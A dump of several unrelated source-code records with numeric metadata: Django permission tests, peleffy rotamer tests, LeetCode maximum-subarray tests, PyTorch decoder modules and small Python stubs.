# username="someUsername",
# email="someEmail@gmail.com",
# password="somePassword",
# first_name="someFirstName",
# last_name="someLastName"
# )
# permission = EventInstanceFolderPermissions.objects.create(
# permissionId='testId2',
# user=user2,
# folderRole="reader"
# )
# permission.folder.add(folder)
# def test_get_list_of_permissions(self):
# url = reverse('event-instance-folder-permissions-view')
# response = self.client.get(url)
# self.assertEqual(response.status_code, status.HTTP_200_OK)
# self.assertEqual(response.data.get("count"), 2)
# def test_get_filtered_list_of_permissions(self):
# url = f"{reverse('event-instance-folder-permissions-view')}?user=yankai14&folder=someTestId"
# response = self.client.get(url)
# self.assertEqual(response.status_code, status.HTTP_200_OK)
# self.assertEqual(response.data.get("count"), 1)
# class CreateEventFolderPermissionsTest(APITestCase):
# def setUp(self):
# self.user, self.client = login()
# event = Event.objects.create(
# eventCode="someEventCode",
# name="someName",
# description="someDescription"
# )
# eventInstance = EventInstance.objects.create(
# eventInstanceCode="someEventInstanceCode",
# startDate=str(timezone.now()),
# endDate=str(timezone.now() + datetime.timedelta(days=10)),
# location="somewhere",
# dates=[str(timezone.now() + datetime.timedelta(days=10+n))
# for n in range(5)],
# fee=0,
# isCompleted=False,
# event=event
# )
# EventInstanceFolder.objects.create(
# folderId="someTestId",
# folderName="someFolderName",
# eventInstance=eventInstance
# )
# def test_create_permission(self):
# GDriveService.give_permission = MagicMock(return_value="testId")
# validPayload = {
# "folderId": "someTestId",
# "folderRole": "reader",
# "username": self.user.username
# }
# url = reverse('event-instance-folder-permissions-view')
# response = self.client.post(
# url,
# data=json.dumps(validPayload),
# content_type="application/json"
# )
# GDriveService.give_permission.assert_called_once_with(
# fileId='someTestId', role='reader', granteeEmail='limyk2014@gmail.com')
# self.assertEqual(response.status_code, status.HTTP_201_CREATED)
# def test_create_duplicate_permission(self):
# GDriveService.give_permission = MagicMock(return_value="testId")
# validPayload = {
# "folderId": "someTestId",
# "folderRole": "reader",
# "username": self.user.username
# }
# url = reverse('event-instance-folder-permissions-view')
# response = self.client.post(
# url,
# data=json.dumps(validPayload),
# content_type="application/json"
# )
# self.assertEqual(response.status_code, status.HTTP_201_CREATED)
# validPayloadDuplicate = {
# "folderId": "someTestId",
# "folderRole": "reader",
# "username": self.user.username
# }
# response = self.client.post(
# url,
# data=json.dumps(validPayloadDuplicate),
# content_type="application/json"
# )
# self.assertEqual(response.status_code, status.HTTP_409_CONFLICT)
# class DeleteEventFolderPermissionsTest(APITestCase):
# def setUp(self):
# self.user, self.client = login()
# event = Event.objects.create(
# eventCode="someEventCode",
# name="someName",
# description="someDescription"
# )
# eventInstance = EventInstance.objects.create(
# eventInstanceCode="someEventInstanceCode",
# startDate=str(timezone.now()),
# endDate=str(timezone.now() + datetime.timedelta(days=10)),
# location="somewhere",
# dates=[str(timezone.now() + datetime.timedelta(days=10+n))
# for n in range(5)],
# fee=0,
# isCompleted=False,
# event=event
# )
# folder = EventInstanceFolder.objects.create(
# folderId="someTestId",
# folderName="someFolderName",
# eventInstance=eventInstance
# )
# permission = EventInstanceFolderPermissions.objects.create(
# permissionId='testId',
# user=self.user,
# folderRole="reader"
# )
# permission.folder.add(folder)
# def test_delete_permission(self):
# GDriveService.delete_permission = MagicMock()
# url = reverse('event-instance-folder-permissions-view', kwargs={
# 'eventInstanceCode': 'someEventInstanceCode', 'username': self.user.username})
# response = self.client.delete(url)
# permissionExist = EventInstanceFolderPermissions.objects.filter(
# folder__eventInstance__eventInstanceCode='eventInstanceCode').exists()
# GDriveService.delete_permission.assert_called_once_with(
# 'someTestId', 'testId')
# self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
# self.assertEqual(permissionExist, False)
# def test_delete_non_existent_permission(self):
# GDriveService.delete_permission = MagicMock()
# url = reverse('event-instance-folder-permissions-view', kwargs={
# 'eventInstanceCode': 'wrongEventInstanceCode', 'username': self.user.username})
# response = self.client.delete(url)
# permissionExist = EventInstanceFolderPermissions.objects.filter(
# permissionId='testId').exists()
# GDriveService.delete_permission.assert_not_called()
# self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
# self.assertEqual(permissionExist, True)
| 35.695381
| 109
| 0.59744
| 2,592
| 28,592
| 6.450231
| 0.087191
| 0.044859
| 0.057779
| 0.062444
| 0.81859
| 0.784198
| 0.774568
| 0.750763
| 0.734733
| 0.719481
| 0
| 0.014423
| 0.27735
| 28,592
| 800
| 110
| 35.74
| 0.794744
| 0.846775
| 0
| 0.338235
| 0
| 0
| 0.080388
| 0
| 0
| 0
| 0
| 0.00125
| 0.102941
| 1
| 0.058824
| false
| 0
| 0.220588
| 0
| 0.294118
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
94b9d0ca11a8b028dae2c4e9902577003226c142
| 14,823
|
py
|
Python
|
peleffy/tests/test_rotamers.py
|
frumpowy/peleffy
|
9b6110a9bf50bedd8e299271a8ff9c3b79339e63
|
[
"MIT"
] | 9
|
2020-11-16T15:07:23.000Z
|
2022-03-10T12:48:20.000Z
|
peleffy/tests/test_rotamers.py
|
NBDsoftware/peleffy
|
d0ca27a366f74b097aac450451f2ad47a3a3f5c8
|
[
"MIT"
] | 75
|
2020-11-02T18:49:08.000Z
|
2022-03-15T16:41:26.000Z
|
peleffy/tests/test_rotamers.py
|
NBDsoftware/peleffy
|
d0ca27a366f74b097aac450451f2ad47a3a3f5c8
|
[
"MIT"
] | 5
|
2020-12-02T16:00:44.000Z
|
2021-09-08T11:11:30.000Z
|
"""
This module contains the tests that check peleffy's rotamer library
builder.
"""
import pytest
from peleffy.utils import get_data_file_path
from peleffy.topology import Molecule
class TestMolecularGraph(object):
"""
It wraps all tests that check the MolecularGraph class.
"""
def test_rotamer_library_builder(self):
"""
It tests the rotamer library builder.
"""
LIGAND_PATH = 'ligands/oleic_acid.pdb'
ligand_path = get_data_file_path(LIGAND_PATH)
molecule = Molecule(ligand_path, exclude_terminal_rotamers=False)
# rotamer_library = RotamerLibrary(molecule)
rotamers_per_branch = molecule.rotamers
assert len(rotamers_per_branch) == 2, "Found an invalid number " + \
"of branches: {}".format(len(rotamers_per_branch))
atom_list_1 = list()
atom_list_2 = list()
rotamers = rotamers_per_branch[0]
for rotamer in rotamers:
atom_list_1.append(set([rotamer.index1, rotamer.index2]))
rotamers = rotamers_per_branch[1]
for rotamer in rotamers:
atom_list_2.append(set([rotamer.index1, rotamer.index2]))
EXPECTED_INDICES_1 = [set([9, 10]), set([8, 9]), set([7, 8]),
set([6, 7]), set([5, 6]), set([2, 5]),
set([0, 2]), set([0, 1])]
EXPECTED_INDICES_2 = [set([12, 11]), set([12, 13]), set([13, 14]),
set([14, 15]), set([15, 16]), set([16, 17]),
set([17, 18]), set([18, 19])]
where_1 = list()
for atom_pair in atom_list_1:
if atom_pair in EXPECTED_INDICES_1:
where_1.append(1)
elif atom_pair in EXPECTED_INDICES_2:
where_1.append(2)
else:
where_1.append(0)
where_2 = list()
for atom_pair in atom_list_2:
if atom_pair in EXPECTED_INDICES_1:
where_2.append(1)
elif atom_pair in EXPECTED_INDICES_2:
where_2.append(2)
else:
where_2.append(0)
assert (all(i == 1 for i in where_1)
and all(i == 2 for i in where_2)) or \
(all(i == 2 for i in where_1)
and all(i == 1 for i in where_2)), "Invalid rotamer library " + \
"{}, {}".format(where_1, where_2)
assert (all(i == 1 for i in where_1)
and all(i == 2 for i in where_2)
and len(where_1) == len(EXPECTED_INDICES_1)
and len(where_2) == len(EXPECTED_INDICES_2)) or \
(all(i == 2 for i in where_1)
and all(i == 1 for i in where_2)
and len(where_1) == len(EXPECTED_INDICES_2)
and len(where_2) == len(EXPECTED_INDICES_1)), "Unexpected " + \
"number of rotamers"
def test_terminal_rotamer_filtering(self):
"""
It tests the rotamer library builder when the terminal rotatable bonds
are ignored.
"""
LIGAND_PATH = 'ligands/oleic_acid.pdb'
ligand_path = get_data_file_path(LIGAND_PATH)
molecule = Molecule(ligand_path, exclude_terminal_rotamers=True)
rotamers_per_branch = molecule.rotamers
assert len(rotamers_per_branch) == 2, "Found an invalid number " + \
"of branches: {}".format(len(rotamers_per_branch))
atom_list_1 = list()
atom_list_2 = list()
rotamers = rotamers_per_branch[0]
for rotamer in rotamers:
atom_list_1.append(set([rotamer.index1, rotamer.index2]))
rotamers = rotamers_per_branch[1]
for rotamer in rotamers:
atom_list_2.append(set([rotamer.index1, rotamer.index2]))
EXPECTED_INDICES_1 = [set([9, 10]), set([8, 9]), set([7, 8]),
set([6, 7]), set([5, 6]), set([2, 5]),
set([0, 2]), set([0, 1])]
EXPECTED_INDICES_2 = [set([12, 11]), set([12, 13]), set([13, 14]),
set([14, 15]), set([15, 16]), set([16, 17]),
set([17, 18])]
where_1 = list()
for atom_pair in atom_list_1:
if atom_pair in EXPECTED_INDICES_1:
where_1.append(1)
elif atom_pair in EXPECTED_INDICES_2:
where_1.append(2)
else:
where_1.append(0)
where_2 = list()
for atom_pair in atom_list_2:
if atom_pair in EXPECTED_INDICES_1:
where_2.append(1)
elif atom_pair in EXPECTED_INDICES_2:
where_2.append(2)
else:
where_2.append(0)
assert (all(i == 1 for i in where_1)
and all(i == 2 for i in where_2)) or \
(all(i == 2 for i in where_1)
and all(i == 1 for i in where_2)), "Invalid rotamer library " + \
"{}, {}".format(where_1, where_2)
assert (all(i == 1 for i in where_1)
and all(i == 2 for i in where_2)
and len(where_1) == len(EXPECTED_INDICES_1)
and len(where_2) == len(EXPECTED_INDICES_2)) or \
(all(i == 2 for i in where_1)
and all(i == 1 for i in where_2)
and len(where_1) == len(EXPECTED_INDICES_2)
and len(where_2) == len(EXPECTED_INDICES_1)), "Unexpected " + \
"number of rotamers"
def test_rotamer_core_constraint(self):
"""
It tests the rotamer library builder when constraining its core
to contain a specific atom.
"""
LIGAND_PATH = 'ligands/oleic_acid.pdb'
ligand_path = get_data_file_path(LIGAND_PATH)
# Test atom index constraint
molecule = Molecule(ligand_path, core_constraints=[19, ],
exclude_terminal_rotamers=False)
rotamers_per_branch = molecule.rotamers
assert len(rotamers_per_branch) == 1, "Found an invalid number " + \
"of branches: {}".format(len(rotamers_per_branch))
atom_list = list()
for rotamer in rotamers_per_branch[0]:
atom_list.append(set([rotamer.index1, rotamer.index2]))
EXPECTED_INDICES = [set([18, 19]), set([17, 18]), set([16, 17]),
set([15, 16]), set([14, 15]), set([13, 14]),
set([12, 13]), set([11, 12]), set([9, 10]),
set([8, 9]), set([7, 8]), set([6, 7]),
set([5, 6]), set([2, 5]), set([0, 2]),
set([0, 1])]
assert len(atom_list) == len(EXPECTED_INDICES), "Unexpected " + \
"number of rotamers"
assert all(atom_pair in EXPECTED_INDICES for atom_pair in atom_list), \
"Invalid rotamer library"
# Test PDB atom name constraint
molecule = Molecule(ligand_path, core_constraints=[' C18', ],
exclude_terminal_rotamers=False)
rotamers_per_branch = molecule.rotamers
assert len(rotamers_per_branch) == 1, "Found an invalid number " + \
"of branches: {}".format(len(rotamers_per_branch))
atom_list = list()
for rotamer in rotamers_per_branch[0]:
atom_list.append(set([rotamer.index1, rotamer.index2]))
EXPECTED_INDICES = [set([18, 19]), set([17, 18]), set([16, 17]),
set([15, 16]), set([14, 15]), set([13, 14]),
set([12, 13]), set([11, 12]), set([9, 10]),
set([8, 9]), set([7, 8]), set([6, 7]),
set([5, 6]), set([2, 5]), set([0, 2]),
set([0, 1])]
assert len(atom_list) == len(EXPECTED_INDICES), "Unexpected " + \
"number of rotamers"
assert all(atom_pair in EXPECTED_INDICES for atom_pair in atom_list), \
"Invalid rotamer library"
# Test core constraint with terminal exclusion
molecule = Molecule(ligand_path, core_constraints=[' C18', ],
exclude_terminal_rotamers=True)
rotamers_per_branch = molecule.rotamers
assert len(rotamers_per_branch) == 1, "Found an invalid number " + \
"of branches: {}".format(len(rotamers_per_branch))
atom_list = list()
for rotamer in rotamers_per_branch[0]:
atom_list.append(set([rotamer.index1, rotamer.index2]))
EXPECTED_INDICES = [set([17, 18]), set([16, 17]), set([15, 16]),
set([14, 15]), set([13, 14]), set([12, 13]),
set([11, 12]), set([9, 10]), set([8, 9]),
set([7, 8]), set([6, 7]), set([5, 6]),
set([2, 5]), set([0, 2]), set([0, 1])]
assert len(atom_list) == len(EXPECTED_INDICES), "Unexpected " + \
"number of rotamers"
assert all(atom_pair in EXPECTED_INDICES for atom_pair in atom_list), \
"Invalid rotamer library"
# Test core constraint with a central core
molecule = Molecule(ligand_path, core_constraints=[' C9 ', ],
exclude_terminal_rotamers=True)
rotamers_per_branch = molecule.rotamers
assert len(rotamers_per_branch) == 2, "Found an invalid number " + \
"of branches: {}".format(len(rotamers_per_branch))
atom_list_1 = list()
atom_list_2 = list()
rotamers = rotamers_per_branch[0]
for rotamer in rotamers:
atom_list_1.append(set([rotamer.index1, rotamer.index2]))
rotamers = rotamers_per_branch[1]
for rotamer in rotamers:
atom_list_2.append(set([rotamer.index1, rotamer.index2]))
EXPECTED_INDICES_1 = [set([9, 10]), set([8, 9]), set([7, 8]),
set([6, 7]), set([5, 6]), set([2, 5]),
set([0, 2]), set([0, 1])]
EXPECTED_INDICES_2 = [set([12, 11]), set([12, 13]), set([13, 14]),
set([14, 15]), set([15, 16]), set([16, 17]),
set([17, 18])]
where_1 = list()
for atom_pair in atom_list_1:
if atom_pair in EXPECTED_INDICES_1:
where_1.append(1)
elif atom_pair in EXPECTED_INDICES_2:
where_1.append(2)
else:
where_1.append(0)
where_2 = list()
for atom_pair in atom_list_2:
if atom_pair in EXPECTED_INDICES_1:
where_2.append(1)
elif atom_pair in EXPECTED_INDICES_2:
where_2.append(2)
else:
where_2.append(0)
assert (all(i == 1 for i in where_1)
and all(i == 2 for i in where_2)) or \
(all(i == 2 for i in where_1)
and all(i == 1 for i in where_2)), "Invalid rotamer library " + \
"{}, {}".format(where_1, where_2)
assert (all(i == 1 for i in where_1)
and all(i == 2 for i in where_2)
and len(where_1) == len(EXPECTED_INDICES_1)
and len(where_2) == len(EXPECTED_INDICES_2)) or \
(all(i == 2 for i in where_1)
and all(i == 1 for i in where_2)
and len(where_1) == len(EXPECTED_INDICES_2)
and len(where_2) == len(EXPECTED_INDICES_1)), "Unexpected " + \
"number of rotamers"
# Test core constraint with a multiple central core
molecule = Molecule(ligand_path,
core_constraints=[' C8 ', ' C9 ', ' C10'],
exclude_terminal_rotamers=True)
rotamers_per_branch = molecule.rotamers
assert len(rotamers_per_branch) == 2, "Found an invalid number " + \
"of branches: {}".format(len(rotamers_per_branch))
atom_list_1 = list()
atom_list_2 = list()
rotamers = rotamers_per_branch[0]
for rotamer in rotamers:
atom_list_1.append(set([rotamer.index1, rotamer.index2]))
rotamers = rotamers_per_branch[1]
for rotamer in rotamers:
atom_list_2.append(set([rotamer.index1, rotamer.index2]))
EXPECTED_INDICES_1 = [set([8, 9]), set([7, 8]), set([6, 7]),
set([5, 6]), set([2, 5]), set([0, 2]),
set([0, 1])]
EXPECTED_INDICES_2 = [set([12, 11]), set([12, 13]), set([13, 14]),
set([14, 15]), set([15, 16]), set([16, 17]),
set([17, 18])]
where_1 = list()
for atom_pair in atom_list_1:
if atom_pair in EXPECTED_INDICES_1:
where_1.append(1)
elif atom_pair in EXPECTED_INDICES_2:
where_1.append(2)
else:
where_1.append(0)
where_2 = list()
for atom_pair in atom_list_2:
if atom_pair in EXPECTED_INDICES_1:
where_2.append(1)
elif atom_pair in EXPECTED_INDICES_2:
where_2.append(2)
else:
where_2.append(0)
assert (all(i == 1 for i in where_1)
and all(i == 2 for i in where_2)) or \
(all(i == 2 for i in where_1)
and all(i == 1 for i in where_2)), "Invalid rotamer library " + \
"{}, {}".format(where_1, where_2)
assert (all(i == 1 for i in where_1)
and all(i == 2 for i in where_2)
and len(where_1) == len(EXPECTED_INDICES_1)
and len(where_2) == len(EXPECTED_INDICES_2)) or \
(all(i == 2 for i in where_1)
and all(i == 1 for i in where_2)
and len(where_1) == len(EXPECTED_INDICES_2)
and len(where_2) == len(EXPECTED_INDICES_1)), "Unexpected " + \
"number of rotamers"
def test_rotamer_core_constraint_adjacency(self):
"""
        It tests the adjacency check that is performed prior to building
        the rotamer library with core constraints.
"""
LIGAND_PATH = 'ligands/oleic_acid.pdb'
ligand_path = get_data_file_path(LIGAND_PATH)
# Test adjacent core constraint selection
_ = Molecule(ligand_path,
core_constraints=[' C8 ', ' C9 ', ' C10'])
# Test non adjacent core constraint selection
with pytest.raises(ValueError) as e:
_ = Molecule(ligand_path,
core_constraints=[' C1 ', ' C9 ', ' C10'])
assert str(e.value) == 'All atoms in atom constraints must be ' \
+ 'adjacent and atom C1 is not'
| 38.803665
| 79
| 0.526951
| 1,906
| 14,823
| 3.88405
| 0.071354
| 0.099284
| 0.073484
| 0.047548
| 0.901391
| 0.893692
| 0.893692
| 0.880724
| 0.849791
| 0.849791
| 0
| 0.061873
| 0.354517
| 14,823
| 381
| 80
| 38.905512
| 0.711852
| 0.052958
| 0
| 0.904059
| 0
| 0
| 0.062338
| 0.006335
| 0
| 0
| 0
| 0
| 0.081181
| 1
| 0.01476
| false
| 0
| 0.01107
| 0
| 0.02952
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bfd51321e416d82e6449149b55525903a92332de
| 3,193
|
py
|
Python
|
src/p053-maximum-subarray/test_solution.py
|
bazadactyl/leetcode-solutions
|
2e332b8ec4c4724b074faa8e7a76e861082198bb
|
[
"Unlicense"
] | null | null | null |
src/p053-maximum-subarray/test_solution.py
|
bazadactyl/leetcode-solutions
|
2e332b8ec4c4724b074faa8e7a76e861082198bb
|
[
"Unlicense"
] | null | null | null |
src/p053-maximum-subarray/test_solution.py
|
bazadactyl/leetcode-solutions
|
2e332b8ec4c4724b074faa8e7a76e861082198bb
|
[
"Unlicense"
] | null | null | null |
import unittest
from solution import Solution
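# Note: `Solution` comes from the sibling solution.py, which is not included
# here. For reference, maxSubArray is assumed to implement Kadane's algorithm,
# roughly along these lines (a sketch under that assumption, not the actual file):
#
#   class Solution:
#       def maxSubArray(self, nums):
#           best = current = nums[0]
#           for x in nums[1:]:
#               current = max(x, current + x)  # extend the run or start over
#               best = max(best, current)
#           return best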
class SolutionTestCase(unittest.TestCase):
def test_example_1(self):
nums = [-2, 1, -3, 4, -1, 2, 1, -5, 4]
expected = 6
output = Solution().maxSubArray(nums)
self.assertEqual(expected, output)
def test_example_2(self):
nums = [1]
expected = 1
output = Solution().maxSubArray(nums)
self.assertEqual(expected, output)
def test_example_3(self):
nums = [5, 4, -1, 7, 8]
expected = 23
output = Solution().maxSubArray(nums)
self.assertEqual(expected, output)
def test_case_1(self):
nums = [-10]
expected = -10
output = Solution().maxSubArray(nums)
self.assertEqual(expected, output)
def test_case_2(self):
nums = [0]
expected = 0
output = Solution().maxSubArray(nums)
self.assertEqual(expected, output)
def test_case_3(self):
nums = [1, 2]
expected = 3
output = Solution().maxSubArray(nums)
self.assertEqual(expected, output)
def test_case_4(self):
nums = [-1, 2]
expected = 2
output = Solution().maxSubArray(nums)
self.assertEqual(expected, output)
def test_case_5(self):
nums = [-1, -2]
expected = -1
output = Solution().maxSubArray(nums)
self.assertEqual(expected, output)
def test_case_6(self):
nums = [-2, -1]
expected = -1
output = Solution().maxSubArray(nums)
self.assertEqual(expected, output)
def test_case_7(self):
nums = [0, 0]
expected = 0
output = Solution().maxSubArray(nums)
self.assertEqual(expected, output)
def test_case_8(self):
nums = [0, 100, 0]
expected = 100
output = Solution().maxSubArray(nums)
self.assertEqual(expected, output)
def test_case_9(self):
nums = [0, -100, 0]
expected = 0
output = Solution().maxSubArray(nums)
self.assertEqual(expected, output)
def test_case_10(self):
nums = [100, 0, 100]
expected = 200
output = Solution().maxSubArray(nums)
self.assertEqual(expected, output)
def test_case_11(self):
nums = [-100, 0, -100]
expected = 0
output = Solution().maxSubArray(nums)
self.assertEqual(expected, output)
def test_case_12(self):
nums = [200, -100, 900, -100, 300]
expected = 1200
output = Solution().maxSubArray(nums)
self.assertEqual(expected, output)
def test_case_13(self):
nums = [100, -100, 900, -100, 100]
expected = 900
output = Solution().maxSubArray(nums)
self.assertEqual(expected, output)
def test_case_14(self):
nums = [101, -100, 900, -100, 101]
expected = 902
output = Solution().maxSubArray(nums)
self.assertEqual(expected, output)
def test_case_15(self):
nums = [-10, -15, -2, -17, -20]
expected = -2
output = Solution().maxSubArray(nums)
self.assertEqual(expected, output)
if __name__ == '__main__':
unittest.main()
| 27.059322
| 46
| 0.5772
| 362
| 3,193
| 4.969613
| 0.127072
| 0.070039
| 0.250139
| 0.290161
| 0.795998
| 0.774875
| 0.735409
| 0.735409
| 0.735409
| 0.735409
| 0
| 0.072165
| 0.301284
| 3,193
| 117
| 47
| 27.290598
| 0.7342
| 0
| 0
| 0.442105
| 0
| 0
| 0.002505
| 0
| 0
| 0
| 0
| 0
| 0.189474
| 1
| 0.189474
| false
| 0
| 0.021053
| 0
| 0.221053
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
44a1b1628f95f3a5c325b62a5de965e5f95c0bf3
| 98
|
py
|
Python
|
examples/wagsley/wagsley/schema/types/query.py
|
Blogsley/blogsley
|
0ca17397af5d53c2fac3affb5eacec2f8d941d37
|
[
"MIT"
] | null | null | null |
examples/wagsley/wagsley/schema/types/query.py
|
Blogsley/blogsley
|
0ca17397af5d53c2fac3affb5eacec2f8d941d37
|
[
"MIT"
] | null | null | null |
examples/wagsley/wagsley/schema/types/query.py
|
Blogsley/blogsley
|
0ca17397af5d53c2fac3affb5eacec2f8d941d37
|
[
"MIT"
] | null | null | null |
from accounts.query import *
from posts.query import *
#from blogsley.django.media.query import *
| 24.5
| 42
| 0.785714
| 14
| 98
| 5.5
| 0.571429
| 0.428571
| 0.38961
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.122449
| 98
| 3
| 43
| 32.666667
| 0.895349
| 0.418367
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
44b6c918c54d93df9c7726a7e41d852e02637c93
| 171
|
py
|
Python
|
forgebox/test_nbdev.py
|
raynardj/forgebox
|
4ed057ecb1fd0e1b062e6ffb64cf2e4279cbf3ac
|
[
"MIT"
] | 3
|
2020-02-05T08:55:22.000Z
|
2021-12-24T06:42:29.000Z
|
forgebox/test_nbdev.py
|
raynardj/forgebox
|
4ed057ecb1fd0e1b062e6ffb64cf2e4279cbf3ac
|
[
"MIT"
] | 8
|
2020-08-25T10:28:53.000Z
|
2021-08-03T09:43:11.000Z
|
forgebox/test_nbdev.py
|
raynardj/forgebox
|
4ed057ecb1fd0e1b062e6ffb64cf2e4279cbf3ac
|
[
"MIT"
] | null | null | null |
# AUTOGENERATED! DO NOT EDIT! File to edit: nbs/test_nbdev.ipynb (unless otherwise specified).
__all__ = ['test_nbdev_func']
# Cell
def test_nbdev_func():
return 42
| 21.375
| 94
| 0.736842
| 25
| 171
| 4.68
| 0.76
| 0.230769
| 0.222222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013889
| 0.157895
| 171
| 8
| 95
| 21.375
| 0.798611
| 0.567251
| 0
| 0
| 1
| 0
| 0.208333
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0.333333
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 7
|
44b80a7baf0879bdcb523f27f1c94b82870e62b2
| 1,731
|
py
|
Python
|
models/decoders.py
|
exnx/gcn-triplet-encoding
|
a26aaa87724b0003a08d5c2d8d1d3f96430df500
|
[
"MIT"
] | 20
|
2020-08-10T15:46:35.000Z
|
2022-01-18T12:10:09.000Z
|
models/decoders.py
|
exnx/gcn-triplet-encoding
|
a26aaa87724b0003a08d5c2d8d1d3f96430df500
|
[
"MIT"
] | 7
|
2020-09-08T17:16:12.000Z
|
2022-03-29T12:25:31.000Z
|
models/decoders.py
|
exnx/gcn-triplet-encoding
|
a26aaa87724b0003a08d5c2d8d1d3f96430df500
|
[
"MIT"
] | 4
|
2020-09-05T07:45:08.000Z
|
2021-12-03T02:45:46.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Jan 8 18:45:02 2020
@author: dipu
"""
import torch.nn as nn
def raster_decoder():
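    """Image decoder: four Upsample(x2) + ConvTranspose2d + ReLU stages that
    map 32 feature channels down to a 3-channel raster output."""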
    decoder = nn.Sequential(
        nn.Upsample(scale_factor=2, mode='nearest'),
        nn.ConvTranspose2d(32, 16, 3),
        nn.ReLU(),
        nn.Upsample(scale_factor=2, mode='nearest'),
        nn.ConvTranspose2d(16, 16, 3),
        nn.ReLU(),
        nn.Upsample(scale_factor=2, mode='nearest'),
        nn.ConvTranspose2d(16, 8, 3),
        nn.ReLU(),
        nn.Upsample(scale_factor=2, mode='nearest'),
        nn.ConvTranspose2d(8, 3, 3),
        nn.ReLU(),
    )
    return decoder
def decoder_25Channel():
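    """25-channel decoder: same upsampling structure as raster_decoder, but
    every transposed convolution after the first keeps 25 channels."""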
    decoder = nn.Sequential(
        nn.Upsample(scale_factor=2, mode='nearest'),
        nn.ConvTranspose2d(32, 25, 3),
        nn.ReLU(),
        nn.Upsample(scale_factor=2, mode='nearest'),
        nn.ConvTranspose2d(25, 25, 3),
        nn.ReLU(),
        nn.Upsample(scale_factor=2, mode='nearest'),
        nn.ConvTranspose2d(25, 25, 3),
        nn.ReLU(),
        nn.Upsample(scale_factor=2, mode='nearest'),
        nn.ConvTranspose2d(25, 25, 3),
        nn.ReLU(),
    )
    return decoder
def decoder_25Channel_convOnly():
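    """25-channel decoder built from strided transposed convolutions only,
    with no explicit Upsample layers."""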
    decoder = nn.Sequential(
        nn.ConvTranspose2d(32, 25, 3, stride=2),
        nn.ReLU(),
        nn.ConvTranspose2d(25, 25, 3, stride=2),
        nn.ReLU(),
        nn.ConvTranspose2d(25, 25, 3, stride=2),
        nn.ReLU(),
        nn.ConvTranspose2d(25, 25, 3, stride=2),
        nn.ReLU(),
    )
    return decoder
| 24.728571
| 59
| 0.50491
| 196
| 1,731
| 4.397959
| 0.209184
| 0.236659
| 0.083527
| 0.194896
| 0.839907
| 0.817865
| 0.817865
| 0.817865
| 0.735499
| 0.735499
| 0
| 0.0875
| 0.352975
| 1,731
| 69
| 60
| 25.086957
| 0.682143
| 0.054304
| 0
| 0.711111
| 0
| 0
| 0.034398
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066667
| false
| 0
| 0.022222
| 0
| 0.155556
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
44d12aeb002823c21c84507e08640524915ddf01
| 111
|
py
|
Python
|
odoo-13.0/addons/hr_attendance/tests/__init__.py
|
VaibhavBhujade/Blockchain-ERP-interoperability
|
b5190a037fb6615386f7cbad024d51b0abd4ba03
|
[
"MIT"
] | null | null | null |
odoo-13.0/addons/hr_attendance/tests/__init__.py
|
VaibhavBhujade/Blockchain-ERP-interoperability
|
b5190a037fb6615386f7cbad024d51b0abd4ba03
|
[
"MIT"
] | null | null | null |
odoo-13.0/addons/hr_attendance/tests/__init__.py
|
VaibhavBhujade/Blockchain-ERP-interoperability
|
b5190a037fb6615386f7cbad024d51b0abd4ba03
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from . import test_hr_attendance_constraints
from . import test_hr_attendance_process
| 22.2
| 44
| 0.774775
| 15
| 111
| 5.333333
| 0.666667
| 0.25
| 0.35
| 0.4
| 0.65
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010309
| 0.126126
| 111
| 4
| 45
| 27.75
| 0.814433
| 0.189189
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
